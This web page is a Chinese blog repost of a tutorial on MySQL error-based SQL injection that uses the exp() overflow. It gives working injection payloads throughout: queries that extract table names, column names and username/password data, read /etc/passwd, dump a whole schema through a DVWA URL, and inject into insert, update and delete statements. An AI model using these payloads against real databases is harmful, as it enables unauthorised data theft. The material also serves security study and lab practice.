<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="使用exp进行SQL报错注入(转) 此文为BIGINT Overflow Error Based SQL Injection的具体发现与实践 from:https://osandamalith.wordpress.com/2015/07/15/error-based-sql-injection-using-exp/ 0x01 前言概述 好消息好消息～作者又在MySQL中发现了一个Double型数据">
<meta property="og:type" content="article">
<meta property="og:title" content="使用exp进行SQL报错注入">
<meta property="og:url" content="http://yoursite.com/2018/08/08/使用exp进行SQL报错注入/index.html">
<meta property="og:site_name" content="Pentest&#39;Blog">
<meta property="og:description" content="使用exp进行SQL报错注入(转) 此文为BIGINT Overflow Error Based SQL Injection的具体发现与实践 from:https://osandamalith.wordpress.com/2015/07/15/error-based-sql-injection-using-exp/ 0x01 前言概述 好消息好消息～作者又在MySQL中发现了一个Double型数据">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2018-08-08T08:43:50.554Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="使用exp进行SQL报错注入">
<meta name="twitter:description" content="使用exp进行SQL报错注入(转) 此文为BIGINT Overflow Error Based SQL Injection的具体发现与实践 from:https://osandamalith.wordpress.com/2015/07/15/error-based-sql-injection-using-exp/ 0x01 前言概述 好消息好消息～作者又在MySQL中发现了一个Double型数据">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/08/08/使用exp进行SQL报错注入/"/>





  <title>使用exp进行SQL报错注入 | Pentest'Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Pentest'Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">在接下来的余生中,只做一件事,从0到1</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/08/08/使用exp进行SQL报错注入/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="AlwaysBoys">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Pentest'Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">使用exp进行SQL报错注入</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-08-08T16:00:00+08:00">
                2018-08-08
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>使用exp进行SQL报错注入(转)</p>
<p>此文为BIGINT Overflow Error Based SQL Injection的具体发现与实践</p>
<p>from:<a href="https://osandamalith.wordpress.com/2015/07/15/error-based-sql-injection-using-exp/" target="_blank" rel="noopener">https://osandamalith.wordpress.com/2015/07/15/error-based-sql-injection-using-exp/</a></p>
<h1 id="0x01-前言概述"><a href="#0x01-前言概述" class="headerlink" title="0x01 前言概述"></a>0x01 前言概述</h1><hr>
<p>好消息好消息～作者又在MySQL中发现了一个Double型数据溢出。如果你想了解利用溢出来注出数据，你可以读一下作者之前发的博文：BIGINT Overflow Error based injections，drops上面也有对应翻译，具体见这里。当我们拿到MySQL里的函数时，作者比较感兴趣的是其中的数学函数，它们也应该包含一些数据类型来保存数值。所以作者就跑去测试看哪些函数会出现溢出错误。然后作者发现，当传递一个大于709的值时，函数exp()就会引起一个溢出错误。</p>
<p>mysql&gt; select exp(709);<br>+———————–+<br>| exp(709)              |<br>+———————–+<br>| 8.218407461554972e307 |<br>+———————–+<br>1 row in set (0.00 sec) </p>
<p>mysql&gt; select exp(710);<br>ERROR 1690 (22003): DOUBLE value is out of range in ‘exp(710)’</p>
<p>在MySQL中，exp与ln和log的功能相反，简单介绍下，就是log和ln都返回以e为底数的对数，见等式：</p>
<p>enter image description here</p>
<p>enter image description here</p>
<p>mysql&gt; select log(15);<br>+——————+<br>| log(15)          |<br>+——————+<br>| 2.70805020110221 |<br>+——————+<br>1 row in set (0.00 sec) </p>
<p>mysql&gt; select ln(15);<br>+——————+<br>| ln(15)           |<br>+——————+<br>| 2.70805020110221 |<br>+——————+<br>1 row in set (0.00 sec)</p>
<p>指数函数为对数函数的反函数，exp()即为以e为底的对数函数，如等式：</p>
<p>enter image description here</p>
<p>mysql&gt; select exp(2.70805020110221);<br>+———————–+<br>| exp(2.70805020110221) |<br>+———————–+<br>|                    15 |<br>+———————–+<br>1 row in set (0.00 sec)</p>
<h1 id="0x02-注入"><a href="#0x02-注入" class="headerlink" title="0x02 注入"></a>0x02 注入</h1><hr>
<p>当涉及到注入时，我们使用否定查询来造成“DOUBLE value is out of range”的错误。作者之前的博文提到的，将0按位取反就会返回“18446744073709551615”，再加上函数成功执行后返回0的缘故，我们将成功执行的函数取反就会得到最大的无符号BIGINT值。</p>
<p>mysql&gt; select ~0;<br>+———————-+<br>| ~0                   |<br>+———————-+<br>| 18446744073709551615 |<br>+———————-+<br>1 row in set (0.00 sec) </p>
<p>mysql&gt; select ~(select version());<br>+———————-+<br>| ~(select version())  |<br>+———————-+<br>| 18446744073709551610 |<br>+———————-+<br>1 row in set, 1 warning (0.00 sec)</p>
<p>我们通过子查询与按位求反，造成一个DOUBLE overflow error，并借由此注出数据。</p>
<blockquote>
<p><code>exp(~(select*from(select user())x))</code></p>
</blockquote>
<pre><code>mysql&gt; select exp(~(select*from(select user())x));
ERROR 1690 (22003): DOUBLE value is out of range in &apos;exp(~((select &apos;root@localhost&apos; from dual)))&apos;
</code></pre><h1 id="0x03-注出数据"><a href="#0x03-注出数据" class="headerlink" title="0x03 注出数据"></a>0x03 注出数据</h1><hr>
<p>得到表名：</p>
<p>select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x));</p>
<p>得到列名：</p>
<p>select exp(~(select*from(select column_name from information_schema.columns where table_name=’users’ limit 0,1)x));</p>
<p>检索数据：</p>
<p>select exp(~ (select*from(select concat_ws(‘:’,id, username, password) from users limit 0,1)x));</p>
<h1 id="0x04-一蹴而就"><a href="#0x04-一蹴而就" class="headerlink" title="0x04 一蹴而就"></a>0x04 一蹴而就</h1><hr>
<p>这个查询可以从当前的上下文中dump出所有的tables与columns。我们也可以dump出所有的数据库，但由于我们是通过一个错误进行提取，它会返回很少的结果。</p>
<p>exp(~(select<em>from(select(concat(@:=0,(select count(</em>)from<code>information_schema</code>.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))</p>
<p><a href="http://localhost/dvwa/vulnerabilities/sqli/?id=1&#39;" target="_blank" rel="noopener">http://localhost/dvwa/vulnerabilities/sqli/?id=1&#39;</a> or exp(~(select<em>from(select(concat(@:=0,(select count(</em>)from<code>information_schema</code>.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))– -&amp;Submit=Submit#</p>
<p>enter image description here</p>
<h1 id="0x04-读取文件"><a href="#0x04-读取文件" class="headerlink" title="0x04 读取文件"></a>0x04 读取文件</h1><hr>
<p>你可以通过load_file()函数来读取文件，但作者发现有13行的限制，该语句也可以在BIGINT overflow injections中使用。</p>
<p>select exp(~(select*from(select load_file(‘/etc/passwd’))a));</p>
<p>enter image description here</p>
<p>注意，你无法写文件，因为这个错入写入的只是0。</p>
<p>mysql&gt; select exp(~(select*from(select ‘hello’)a)) into outfile ‘C:/out.txt’;<br>ERROR 1690 (22003): DOUBLE value is out of range in ‘exp(~((select ‘hello’ from dual)))’</p>
<p>#type C:\out.txt<br>0</p>
<h1 id="0x05-Injection-in-Insert"><a href="#0x05-Injection-in-Insert" class="headerlink" title="0x05 Injection in Insert"></a>0x05 Injection in Insert</h1><hr>
<p>按部就班就好</p>
<p>mysql&gt; insert into users (id, username, password) values (2, ‘’ ^ exp(~(select*from(select user())x)), ‘Eyre’);<br>ERROR 1690 (22003): DOUBLE value is out of range in ‘exp(~((select ‘root@localhost’ from dual)))’</p>
<p>对于所有的insert，update和delete语句DIOS查询也同样可以使用。</p>
<p>mysql&gt; insert into users (id, username, password) values (2, ‘’ | exp(~(select<em>from(select(concat(@:=0,(select count(</em>)from<code>information_schema</code>.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)), ‘Eyre’);<br>ERROR 1690 (22003): DOUBLE value is out of range in ‘exp(~((select ‘000<br>newdb::users::id<br>newdb::users::username<br>newdb::users::password’ from dual)))’</p>
<h1 id="0x06-Injection-in-Update"><a href="#0x06-Injection-in-Update" class="headerlink" title="0x06 Injection in Update"></a>0x06 Injection in Update</h1><hr>
<p>mysql&gt; update users set password=’Peter’ ^ exp(~(select*from(select user())x)) where id=4;<br>ERROR 1690 (22003): DOUBLE value is out of range in ‘exp(~((select ‘root@localhost’ from dual)))’</p>
<p>0x07 Injection in Delete</p>
<p>mysql&gt; delete from users where id=’1’ | exp(~(select*from(select user())x));<br>ERROR 1690 (22003): DOUBLE value is out of range in ‘exp(~((select ‘root@localhost’ from dual)))’</p>
<h1 id="0x08-总结"><a href="#0x08-总结" class="headerlink" title="0x08 总结"></a>0x08 总结</h1><hr>
<p>和前面的BIGINT注入一样，exp注入也适用于MySQL5.5.5及以上版本。以前的版本对于此情况则是“一言不发”。</p>
<p>mysql&gt; select version();<br>+———————+<br>| version()           |<br>+———————+<br>| 5.0.45-community-nt |<br>+———————+<br>1 row in set (0.00 sec) </p>
<p>mysql&gt; select exp(710);<br>+———-+<br>| exp(710) |<br>+———-+<br>|   1.#INF |<br>+———-+<br>1 row in set (0.00 sec) </p>
<p>mysql&gt; select exp(~0);<br>+———+<br>| exp(~0) |<br>+———+<br>|  1.#INF |<br>+———+<br>1 row in set (0.00 sec)</p>
<p>可能还有其他的函数会产生这种报错呦。（有待你发现啦：）</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/08/08/hexo使用指南/" rel="next" title="hexo使用指南">
                <i class="fa fa-chevron-left"></i> hexo使用指南
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">AlwaysBoys</p>
              <p class="site-description motion-element" itemprop="description">专注于Web攻防研究,关注网络安全技术</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-前言概述"><span class="nav-number">1.</span> <span class="nav-text">0x01 前言概述</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02-注入"><span class="nav-number">2.</span> <span class="nav-text">0x02 注入</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x03-注出数据"><span class="nav-number">3.</span> <span class="nav-text">0x03 注出数据</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x04-一蹴而就"><span class="nav-number">4.</span> <span class="nav-text">0x04 一蹴而就</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x04-读取文件"><span class="nav-number">5.</span> <span class="nav-text">0x04 读取文件</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x05-Injection-in-Insert"><span class="nav-number">6.</span> <span class="nav-text">0x05 Injection in Insert</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x06-Injection-in-Update"><span class="nav-number">7.</span> <span class="nav-text">0x06 Injection in Update</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x08-总结"><span class="nav-number">8.</span> <span class="nav-text">0x08 总结</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">AlwaysBoys</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
